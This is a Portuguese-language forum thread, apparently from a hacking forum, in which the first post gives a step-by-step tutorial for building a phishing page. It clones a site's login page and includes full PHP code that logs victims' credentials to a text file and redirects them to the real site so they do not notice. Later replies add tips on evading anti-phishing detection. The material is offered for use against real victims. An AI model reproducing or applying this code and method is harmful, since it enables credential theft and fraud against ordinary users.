Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Criando Pagina Fake

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Download Criando Pagina Fake

    Criando Pagina Fake :






    1- Selecione um site de destino e navegue até a página de login.


    2- Salve a página inteira indo em Arquivo-> Salvar como .. (Estou fazendo isso no Firefox .)


    3- Você terá agora um arquivo HTML e uma pasta cheia de imagens e talvez alguns arquivos JavaScript. Renomeie o arquivo HTML para index.html e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.


    4- Crie um arquivo PHP com o nome “phish.php“


    5- Cole o seguinte código para o arquivo PHP (phish.php) que você já fez. Este código é o que leva os detalhes de login e os armazena no arquivo “lista.txt“, e depois redireciona para o site real. Desta forma, o usuário vai pensar que ele colocou as informações de login errado e terá êxito, a segunda vez que ele for tentar se logar o site se redirecionara para o site real. Fazendo assim com que a vitima nem perceba que seus dados foram roubados.
    <?php
    Header("Location: http://www.linkdositeoriginal.com");

    $handle = fopen("lista.txt", "a");

    foreach($_GET as $variable => $value) {

    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }fwrite($handle, "\r\n");

    fclose($handle);
    exit;
    ?>

    6. Agora temos que apontar o formulário de login no arquivo HTML para o arquivo PHP (phish.php). Localize o código do formulário no arquivo HTML e alterar o link de ação para o arquivo PHP e do tipo de método de começar assim que as informações apresentadas são passados através da URL. O código HTML deve começar com algo como isto:
    <form action = sitelink ” . com o método = “GET”>
    altere para:
    <form action = Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ” . com o método = “GET”>
    Ou:
    <form action = phish.php ” . com o método = “GET”>


    7. Quando tudo estiver concluído, faça o upload dos arquivos para um webhost gratuito que suporte PHP.


    8. Você acabou de criar uma página de phishing.


    __________________________________________________ __________________________________________________ __________________________________________


    Obs : Se Ajudei Me Ajude Dê OBRIGADO


    Para Quem Tiver Problemas Pode me Add Skype e Ajudarei com Todo Prazer.

    Skype - > lukinhas4443







    Meu Fã ? Usa aí !?


  • Font Size
    #2
    Obrigado por compartilhar, mas no fórum o que mais tem é tutoriais de como fazer pagina fake escrito e em video.

    Comment


    • Font Size
      #3
      Desculpe Entaum

      Desculpa ai Entaum . Não Tinha Visto :\







      Meu Fã ? Usa aí !?

      Comment


      • Font Size
        #4
        Esse foi um dos melhores tutos sobre pag fake que ja vi aqui no site.. consegui entender muito bem... Obrigado

        Comment


        • Font Size
          #5
          z

          Entendi sua intenção a criar o tópico mas pensa assim. 80% das páginas (que geralmente as pessosas querem fazer phishing) não se comunicam por GET e sim por POST e outra, se o PHP que salvar tiver o nome igual sempre phish.php você não acha que o o anti phishing não vai parar a página? :P

          Comment

          X
          Working...
          X